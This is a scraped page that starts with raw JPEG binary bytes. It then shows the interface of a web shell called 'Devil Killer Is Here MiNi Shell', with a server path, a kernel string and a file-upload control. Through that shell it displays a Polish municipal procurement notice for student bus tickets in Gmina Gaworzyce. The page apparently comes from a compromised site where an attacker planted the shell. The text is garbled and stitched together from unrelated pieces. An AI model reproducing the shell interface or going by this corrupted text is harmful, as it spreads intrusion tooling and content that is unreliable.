JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241211/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241211/0064731401-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> „Zakup biletów miesięcznych dla uczniów dojeżdżających do placówek oświatowych w Gminie Gaworzyce w okresie od 1<br/>stycznia 2025 r. do 31 grudnia 2026 r.” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Gaworzyce</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 390647587</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Dworcowa 95</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gaworzyce</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">59-180</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL516 - Legnicko-głogowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">738316285</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">k.kubas@gaworzyce.com.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bip.gaworzyce.com.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Zakup biletów miesięcznych dla uczniów dojeżdżających do placówek oświatowych w Gminie Gaworzyce w okresie od 1<br/>stycznia 2025 r. do 31 grudnia 2026 r.” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-3bcee8af-7f40-4447-abe3-4954a2ae0768</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00647314</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-12-11</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00067723/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.3 „Zakup biletów miesięcznych dla uczniów dojeżdżających do placówek oświatowych w Gminie Gaworzyce w okresie od 1 stycznia 2025 r. do 31 grudnia 2026 r.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/gaworzyce <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja w postępowaniu, w tym składanie ofert, wymiana informacji oraz<br/>przekazywanie dokumentów lub oświadczeń między zamawiającym a wykonawcą odbywa się przy użyciu środków komunikacji<br/>elektronicznej. Postępowanie prowadzone jest w języku polskim w formie elektronicznej za pośrednictwem platformazakupowa.pl<br/>pod adresem<br/>https://platformazakupowa.pl/pn/gaworzyce.Komunikacja między Zamawiającym a Wykonawcami,<br/>w tym przekazywanie wszelkich oświadczeń, wniosków, zawiadomień oraz informacji, odbywać się będzie w formie elektronicznej za<br/>pośrednictwem Platformy i formularza „Wyślij wiadomość”. Za datę przekazania (wpływu) oświadczeń, wniosków, zawiadomień oraz<br/>informacji przyjmuje się datę ich przesłania za pośrednictwem Platformy poprzez kliknięcie przycisku „Wyślij wiadomość” po których<br/>pojawi się komunikat, że wiadomość została wysłana do Zamawiającego. W przypadku awarii platformy zakupowej uznaję się datę<br/>ich otrzymania przez Zamawiającego na adres e-mail:k.kubas@gaworzyce.com.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Informacje, które nie zmieściły się w<br/>tym polu ze względu na ograniczenia ilości znaków dostępne są w SWZ.1. Wymagania techniczne i organizacyjne dotyczące<br/>korespondencji elektronicznej zostały opisane w rozdziale II SWZ. 2. Zamawiający wymaga podpisania oferty, oświadczeń oraz<br/>dokumentów kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zawarto w rozdziale XIX SWZ i w załączniku nr 6 do SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zawarto w rozdziale XIX SWZ i w załączniku nr 6 do SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.22.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest usługa polegająca na zakupie biletów miesięcznych na przewozy* w latach 2025-2026<br/>uczniów i dzieci przedszkolnych z terenu Gminy Gaworzyce i Gminy Niegosławice dojeżdżających do placówek<br/>oświatowych w:<br/>- Szkoły Podstawowej im. Kornela Makuszyńskiego w Gaworzycach, ul. Szkolna 211, 59-180 Gaworzyce<br/>- Publicznego Przedszkola w Gaworzycach, ul. Szkolna 211a, 59-180 Gaworzyce<br/>* Przez pojęcie „przewozu” należy rozumieć usługę transportu uczniów i dzieci przedszkolnych z miejscowości<br/>wymienionych w pkt 4.2 do placówek oświatowych w Gaworzycach.<br/>4.2. Zamawiający szacuje, że usługą przewozu objęte będzie około 185 uczniów i dzieci przedszkolnych w wieku 5-6 lat<br/>uczęszczających do placówek oświatowych gminy Gaworzyce według następującego wykazu:<br/>− przewóz do Szkoły Podstawowej w Gaworzycach, ul. Szkolna 211, 59-180 Gaworzyce, Przedszkola Publicznego w<br/>Gaworzycach, ul. Szkolna 211a, 59-180 Gaworzyce<br/>Miejscowość Liczba uczniów Liczba dzieci przedszkolnych w wieku 6 lat (rocznik 2018) Liczba dzieci przedszkolnych w<br/>wieku 5 lat<br/>(rocznik 2019)<br/>Dzików 9 1 0<br/>Mieszków 12 0 0<br/>Koźlice 28 3 5<br/>Gostyń 12 2 0<br/>Kłobuczyn 54 6 3<br/>Śrem 3 1 0<br/>Witanowice 2 0 0<br/>Kurów Wielki 3 1 0<br/>Dalków 24 5 0<br/>Nowa Jabłona 18 2 0<br/>Nowy Dwór 2 0 0<br/>Korytów 7 2 1<br/>Grabik 5 0 0<br/>Zimna Brzeźnica 4 1 1<br/>Wierzchowice 2 0 0<br/>RAZEM 185 24 10<br/>4.3. Ze względu na specyfikę usługi, przedmiot zamówienia określony został szacunkowo, mimo określenia go przez<br/>Zamawiającego z należytą starannością. Podane liczby uczniów są liczbami aktualnymi na miesiąc listopad 2024 r. i w<br/>trakcie realizacji usługi mogą ulec zmianie. Szacunkowa liczba uczniów i dzieci przedszkolny może ulec zmianie o +/- 15 %<br/>w terminie roku szkolnego.<br/>4.4. Przewozy będą świadczone na podstawie zakupywanych biletów miesięcznych uprawniających do przejazdu środkami<br/>komunikacji publicznej na istniejących lub utworzonych przez Wykonawcę liniach regularnych, zgodnych z trasami<br/>określonymi w pkt 4.11. Bilety miesięczne zakupywane w ramach realizacji przedmiotu zamówienia będą uprawniać do<br/>pierwszeństwa przejazdu uczniów oraz dzieci przedszkolnych z biletem miesięcznym z miejscowości ich zamieszkania do<br/>placówek oświatowych i ich powrotu po skończonych zajęciach do miejscowości ich zamieszkania. Zamawiający zastrzega<br/>sobie prawo do zmian w harmonogramie w okresie realizacji przedmiotu zamówienia, ze względu na okoliczności, których<br/>Strony nie mogły przewidzieć w chwili zawarcia umowy, a podyktowane potrzebami Zamawiającego (np. zmiana planu<br/>zajęć w placówkach oświatowych). Zmiany obejmować mogą godziny kursów, ilości kursów oraz kolejność miejscowości.<br/>Zamawiający dopuszcza także uzasadnione zmiany harmonogramu na wniosek Wykonawcy. Zmiany harmonogramów<br/>Strony będą przekazywać do akceptacji na wskazane w Umowie do kontaktów adresy email w terminie nie krótszym niż 3<br/>dni kalendarzowych od dnia od którego ma obowiązywać nowy / zmieniony harmonogram.<br/>4.4a W ramach linii komunikacyjnych i kursów według rozkładów jazdy utworzonych wg. Niniejszej specyfikacji, poza<br/>niniejszym zleceniem, wykonawca może świadczyć odpłatne usługi transportowe na rzecz innych osób w ramach opłat<br/>biletowych, z zastrzeżeniem, iż musi przede wszystkim zapewnić transport uczniom i opiekunom w ramach zawartej umowy.<br/>Uczniowie bezwzględnie muszą mieć zapewnione miejsca siedzące.<br/>4.5. Szczegółowa, imienna liczba uczniów dla których zostaną zakupione bilety miesięczne (w rozbiciu na poszczególne<br/>miejscowości) będzie przekazywana przez Zamawiającego do Wykonawcy na wskazany w Umowie do kontaktów adres<br/>email w terminie do 27 dnia miesiąca poprzedzającego miesiąc świadczenia usługi przewozu. Zamawiający zastrzega sobie<br/>prawo do zmiany ilości zakupywanych w danym miesiącu biletów miesięcznych, w związku ze zmianą liczby przewożonych<br/>uczniów na zasadach określonych w pkt. 4.3 W przypadku zwiększenia liczby uczniów oraz dzieci przedszkolnych objętych<br/>usługą przewozu Wykonawca musi zapewnić ich dowóz na warunkach określonych w niniejszym postępowaniu.<br/>Wykonawca musi być przygotowany w razie potrzeby na zwiększenie liczby uczniów i dzieci przedszkolnych objętych usługą<br/>przewozu na zasadach określonych w pkt. 4.3 poprzez zapewnienie autobusu o większej liczbie miejsc lub zwiększeniu<br/>liczby kursów ale przy zachowaniu zasady jeden autobus na jedną trasę. Bilet miesięczny dla ucznia oraz dziecka<br/>przedszkolnego upoważnia do przejazdu z miejscowości zamieszkania do placówki oświatowej i z powrotem po<br/>zakończonych zajęciach.<br/>4.6. Pojazdy, którymi będzie świadczona usługa muszą odpowiadać ogólnym warunkom przewozu osób, spełniać wymogi<br/>bezpieczeństwa i warunki techniczne określone odrębnymi przepisami, posiadać ważne polisy ubezpieczeniowe OC i NNW,<br/>aktualne badania techniczne, posiadać odpowiednie oznakowanie dla przewozu uczniów i dzieci przedszkolnych oraz<br/>dysponować odpowiednią ilością miejsc do liczby przewożonych na danej trasie pasażerów. Wykonawca musi zapewnić<br/>przewożonym pasażerom bezpieczny przewóz, tzn. odpowiednie warunki bezpieczeństwa i higieny.<br/>4.7. W przypadku awarii autobusu przewożącego uczniów Wykonawca zobowiązany jest podstawić sprawny autobus<br/>zastępczy i dokończyć przewóz uczniów na danej trasie, przy czym autobus zastępczy musi spełniać wszystkie wymagania<br/>o których mowa w pkt 4.6.<br/>4.8. Wykonawca musi dysponować ilością autobusów odpowiednią do realizacji zamówienia, nie mniejszą niż 2 autobusy o<br/>ilości miejsc siedzących zapewniających właściwą realizację zamówienia, tj. jeden autobus na jedną trasę.<br/>4.9. Opiekę nad uczniami i dziećmi przedszkolnymi w autobusach podczas realizowania usługi przewozu zapewnia wykonywania opieki. Wykonawca zapewnia bezpłatne miejsce dla opiekuna zatrudnionego przez Zamawiającego w każdym<br/>autobusie. Przed rozpoczęciem usługi Zamawiający poinformuje Wykonawcę na wskazany w Umowie do kontaktów adres<br/>email o osobach, które zostały wyznaczone na opiekunów.<br/>4.9a Wykonawca przed podpisaniem umowy w ciągu 5 dni od daty przesłania mu informacji o wyborze oferty zobowiązany<br/>jest do zamontowania w każdym z autobusów, którymi będzie wykonywał niniejszą usługę, monitoringu wizyjnego, który<br/>każdorazowo będzie nagrywał obraz wewnątrz pojazdu podczas codziennego przewozu uczniów. Monitoring musi<br/>obejmować cały autobus. Nagrany materiał powinien być przechowywany przez okres 30 dni od dnia nagrania i w razie<br/>zaistniałej potrzeby niezwłocznie udostępniany Zamawiającemu w formacie ogólnodostępnym.<br/>4.9b Wykonawca zobowiązany jest wyposażyć autobusy, którymi będzie świadczyć usługi przewozu osób, stanowiące<br/>przedmiot zamówienia, w kasy rejestrujące (tzw. „bileterki”) posiadające pozytywną opinię ministra właściwego ds. finansów<br/>publicznych. Kasy te muszą umożliwiać określenie kwoty dopłaty do przewozów, z podziałem na poszczególne kategorie ulg<br/>ustawowych oraz umożliwiać sprzedaż biletów jednorazowych z zastosowaniem ulg ustawowych.<br/>4.10. W ramach otwartego przewozu, Zamawiający może przewozić także dzieci przedszkolne poniżej 5 roku życia - na<br/>koszt rodziców. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60100000-9 - Usługi w zakresie transportu drogowego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2026-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas podstawienia autobusu zastępczego w razie awarii</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki udziału w postępowaniu, dotyczące:<br/>1) posiadania zdolności do występowania w obrocie gospodarczym Zamawiający nie wyznacza szczegółowego warunku w<br/>tym zakresie.<br/>2) posiadania uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych<br/>przepisów:<br/>Zamawiający wymaga posiadanie zezwolenia lub licencji na wykonywanie transportu drogowego, zgodnie z ustawą z dnia 6<br/>września 2001 r. o transporcie drogowym (Dz.U. z 2024 , poz. 1539);<br/>3) sytuacji ekonomicznej lub finansowej:Zamawiający wymaga posiadanie aktualnego ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej<br/>działalności związanej z przedmiotem zamówienia na kwotę, na kwotę co najmniej 300.000,00 zł;<br/>4) zdolności technicznej lub zawodowej;<br/>Wykonawca spełnia warunek, jeżeli wykaże, że: dysponuje co<br/>najmniej dwoma autobusami( Rok Produkcji – 2008 lub nowsze), które łącznie posiadają minimum 130<br/>miejsc siedzących, spełniające wymagania techniczne określone<br/>przepisami ustawy Prawo o Ruchu Drogowym oraz innymi przepisami<br/>szczegółowymi. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia przez<br/>wykonawcę braku podstaw wykluczenia z postępowania, Zamawiający żąda złożenia:<br/>1) oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w<br/>rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym<br/>wykonawcą, który złożył odrębną ofertę, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub<br/>informacjami potwierdzającymi przygotowanie oferty, niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej<br/>2) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w<br/>zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy<br/>wymagają wpisu do rejestru lub ewidencji,<br/>3) oświadczenia własnego wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy,<br/>w zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego, o których mowa w:<br/>a) art. 108 ust. 1 pkt 3 ustawy,<br/>b) art. 108 ust. 1 pkt 4 ustawy, dotyczących orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka<br/>zapobiegawczego,<br/>c) art. 108 ust. 1 pkt 5 ustawy, dotyczących zawarcia z innymi wykonawcami porozumienia mającego na celu zakłócenie konkurencji,<br/>d) art. 108 ust. 1 pkt 6 ustawy,<br/>e) art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na<br/>Ukrainę oraz służących ochronie bezpieczeństwa narodowego ( Dz. U. z 2023 r. poz. 129 ).<br/>Zamawiający żąda od wykonawcy, który polega na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub<br/>ekonomicznej podmiotów udostępniających zasoby na zasadach określonych w art. 118 ustawy, przedstawienia podmiotowych<br/>środków dowodowych, o których mowa w ppkt. 2 – 3)</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">aktualną<br/>licencję na wykonywanie krajowego drogowego przewozu osób lub zezwolenie na wykonywanie zawodu przewoźnika<br/>drogowego w zakresie przewozu osób, zgodnie z ustawą z dnia 6 września 2001r. o transporcie drogowym ( z 2023 r. poz. 760, 919,<br/>1123, 1193, 1195,1523, 1720)<br/>- wykaz narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych wykonawcy w celu wykonania zamówienia<br/>publicznego wraz z informacją o podstawie dysponowania tymi zasobami – wzór wykazu stanowi załącznik nr 8 do SWZ,</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1)pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania<br/>wykonawcy jeżeli w imieniu wykonawcy działa osoba, której umocowanie do jego<br/>reprezentowania nie wynika z dokumentów w przypadku wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia, dokumenty składa każdy z wykonawców, -w przypadku, gdy<br/>wykonawca w celu wykazania spełniania warunków udziału w postępowaniu polega na zdolnościach technicznych lub<br/>zawodowych podmiotów udostępniających zasoby,<br/>należy złożyć ponadto dokumenty dotyczące tego podmiotu, jeżeli w imieniu tego podmiotu<br/>działa osoba, której umocowanie do jego reprezentowania nie wynika z dokumentów,2) W<br/>przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, wraz z ofertą<br/>wykonawcy zobowiązani są złożyć pełnomocnictwo do reprezentowania ich w postępowaniu o<br/>udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie<br/>zamówienia publicznego.<br/>3)W przypadku gdy wykonawca, w celu potwierdzenia spełniania warunków udziału w<br/>postępowaniu, polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby<br/>wykonawca składa wraz z ofertą zobowiązanie podmiotu<br/>udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby<br/>realizacji zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca<br/>realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów . Zobowiązanie podmiotu<br/>udostępniającego<br/>zasoby, ma potwierdzać, że stosunek łączący wykonawcę z podmiotami udostępniającymi<br/>zasoby gwarantuje 